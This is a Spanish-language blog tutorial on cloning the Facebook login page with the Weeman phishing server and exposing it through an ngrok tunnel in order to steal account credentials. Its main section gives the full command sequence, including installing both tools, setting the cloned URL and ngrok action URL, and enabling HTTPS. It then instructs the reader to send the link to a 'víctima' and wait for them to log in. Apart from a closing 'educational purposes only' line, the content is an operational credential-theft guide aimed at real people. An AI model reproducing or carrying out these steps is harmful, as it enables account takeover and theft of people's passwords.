Weeman + Ngrok Hackear Facebook con Phishing
Weeman + Ngrok Hackear Facebook con Phishing
Hacking
·2 Minutos de lectura

Weeman + Ngrok: Hackear Facebook con Phishing

Weeman y Ngrok son las mejores herramienta para realizar ataques de phishing actualmente. Crea tu propio servidor de phishing para hackear cuentas de Facebook u otra red social.

Con Weeman podemos tener un servidor HTTP para phishing en Python, además tiene soporte para la mayoría de los sitios web (los más grandes). Por su lado, ngrok garantiza la creación de túneles seguros a un servidor local.

Anteriormente, publiqué una entrada sobre cómo hackear Facebook con Phishing. Dicho método es muy sencillo y a la vez difícil de dar resultados por ser muy predecible. Ahora veremos otra situación, que con algunos ajustes, las probabilidades de tener éxito aumentan considerablemente.

1. Weeman y Ngrok

  • Primero descargamos y extraemos Ngrok. (Descargar aquí)

Una vez extraído, copiamos el archivo a la carpeta de binarios /usr/bin para ejecutarlo posteriormente.

sudo cp /ruta/ngrok /usr/bin
Descargar y extraer Ngrok
Descargar y extraer Ngrok
  • Descargamos Weeman desde github
git clone https://github.com/samyoyo/weeman.git
  • Para iniciar Weeman, abra la terminal y ejecute los siguientes comandos:
cd weeman 
chmod +x weeman.py 
python weeman.py
show
Descargar e iniciar Weeman
Descargar e iniciar Weeman

2. Hackear Facebook con Phishing

  • Inicie Weeman con el comando show:
Comando show en Weeman
Comando show en Weeman
  • Una vez ejecutado weeman, abra una nueva terminal y ejecute ngrok
ngrok http 8080
  • Ahora en la terminal con Weeman abierto, ejecute los siguientes comandos:
set url https://facebook.com
set action_url xxx_ngrok.io
set port 8080
run
Set y run en Weeman
Comandos Set y run

Por supuesto, xxx_ngrok.io es la URL generada al ejecutar Ngrok anteriormente, ese enlace le servirá como sitio web de Phishing.

  • La URL generada por Ngrok se encuentra en HTTP, para utilizar HTTPS escriba el siguiente comando al ejecutar Ngrok:
ngrok http -bind-tls=true 8080
Phishing HTTPS con Ngrok
Phishing HTTPS con Ngrok

Por último, envíe la URL a la víctima y espere a que abra ese enlace e inicie sesión con sus credenciales.

Ver también

Captura de credenciales de Facebook
Captura de credenciales de Facebook

3. Tutorial: Crear un servidor Phishing

Consulte el tutorial paso a paso para una mejor comprensión de cómo crear un servidor phishing para, por ejemplo, capturar el usuario y contraseña de una cuenta de Facebook.

https://youtu.be/vyxPnOzjgGo

¡SOLO UTILICE CON FINES EDUCATIVOS! ¡Si te ha gustado el artículo, no dudes en compartirlo con los demás 😉 !

Más artículos
TugaRecon Enumeración de Subdominios
TugaRecon: Herramienta Enumeración de Subdominios

Ajustes de privacidad

Decida qué cookies desea permitir. Puede cambiar estos ajustes en cualquier momento. Sin embargo, esto puede hacer que algunas funciones dejen de estar disponibles. Para obtener información sobre eliminar las cookies, por favor consulte la función de ayuda de su navegador. MÁS INFORMACIÓN SOBRE LAS COOKIES QUE USAMOS.

Con el deslizador, puede habilitar o deshabilitar los diferentes tipos de cookies:

Este sitio web

  • Esencial: Recordar sus ajustes de permisos de cookies
  • Esencial: Permitir cookies de sesión
  • Esencial: Recopilar la información que introduzca en el formulario de contacto de un boletín informativo y otros formularios en todas las páginas
  • Esencial: Hacer un seguimiento de lo que introduzca en la cesta de la compra
  • Esencial: Verificar que ha iniciado sesión en su cuenta de usuario
  • Esencial: Recordar la versión del idioma seleccionado

Este sitio web no

  • Recordar los datos de inicio de sesión
  • Funcionalidad: Recordar los ajustes de redes sociales
  • Funcionalidad: Recordar el país y la región seleccionados
  • Análisis: Hacer un seguimiento de las páginas visitadas y de la interacción en las mismas
  • Análisis: Hacer un seguimiento de la ubicación y la región según la dirección IP
  • Análisis: Hacer un seguimiento del tiempo pasado en cada página
  • Análisis: Aumentar la calidad de los datos de las funciones estadísticas
  • Publicidad: Adaptar la información y la publicidad a sus intereses según, p.ej., el contenido que ha visitado antes. (Actualmente no usamos segmentación ni cookies de segmentación)
  • Publicidad: Recopilar información personalmente identificable como el nombre y la ubicación

Este sitio web

  • Esencial: Recordar sus ajustes de permisos de cookies
  • Esencial: Permitir cookies de sesión
  • Esencial: Recopilar la información que introduzca en el formulario de contacto de un boletín informativo y otros formularios en todas las páginas
  • Esencial: Hacer un seguimiento de lo que introduzca en la cesta de la compra
  • Esencial: Verificar que ha iniciado sesión en su cuenta de usuario
  • Esencial: Recordar la versión del idioma seleccionado
  • Funcionalidad: Recordar todos los ajustes de redes sociales
  • Funcionalidad: Recordar el país y la región seleccionados

Este sitio web no

  • Análisis: Hacer un seguimiento de las páginas visitadas y de la interacción en las mismas
  • Análisis: Hacer un seguimiento de la ubicación y la región según la dirección IP
  • Análisis: Hacer un seguimiento del tiempo pasado en cada página
  • Análisis: Aumentar la calidad de los datos de las funciones estadísticas
  • Publicidad: Adaptar la información y la publicidad a sus intereses según, p.ej., el contenido que ha visitado antes. (Actualmente no usamos segmentación ni cookies de segmentación)
  • Publicidad: Recopilar información personalmente identificable como el nombre y la ubicación

Este sitio web

  • Esencial: Recordar sus ajustes de permisos de cookies
  • Esencial: Permitir cookies de sesión
  • Esencial: Recopilar la información que introduzca en el formulario de contacto de un boletín informativo y otros formularios en todas las páginas
  • Esencial: Hacer un seguimiento de lo que introduzca en la cesta de la compra
  • Esencial: Verificar que ha iniciado sesión en su cuenta de usuario
  • Esencial: Recordar la versión del idioma seleccionado
  • Funcionalidad: Recordar todos los ajustes de redes sociales
  • Funcionalidad: Recordar el país y la región seleccionados
  • Análisis: Hacer un seguimiento de las páginas visitadas y de la interacción en las mismas
  • Análisis: Hacer un seguimiento de la ubicación y la región según la dirección IP
  • Análisis: Hacer un seguimiento del tiempo pasado en cada página
  • Análisis: Aumentar la calidad de los datos de las funciones estadísticas

Este sitio web no

  • Publicidad: Adaptar la información y la publicidad a sus intereses según, p.ej., el contenido que ha visitado antes. (Actualmente no usamos segmentación ni cookies de segmentación)
  • Publicidad: Recopilar información personalmente identificable como el nombre y la ubicación

Este sitio web

  • Funcionalidad: Recordar los ajustes de redes sociales
  • Funcionalidad: Recordar el país y la región seleccionados
  • Análisis: Hacer un seguimiento de las páginas visitadas y de la interacción en las mismas
  • Análisis: Hacer un seguimiento de la ubicación y la región según la dirección IP
  • Análisis: Hacer un seguimiento del tiempo pasado en cada página
  • Análisis: Aumentar la calidad de los datos de las funciones estadísticas
  • Publicidad: Adaptar la información y la publicidad a sus intereses según, p.ej., el contenido que ha visitado antes. (Actualmente no usamos segmentación ni cookies de segmentación)
  • Publicidad: Recopilar información personalmente identificable como el nombre y la ubicación

Este sitio web no

  • Recordar los datos de inicio de sesión
Guardar cerrar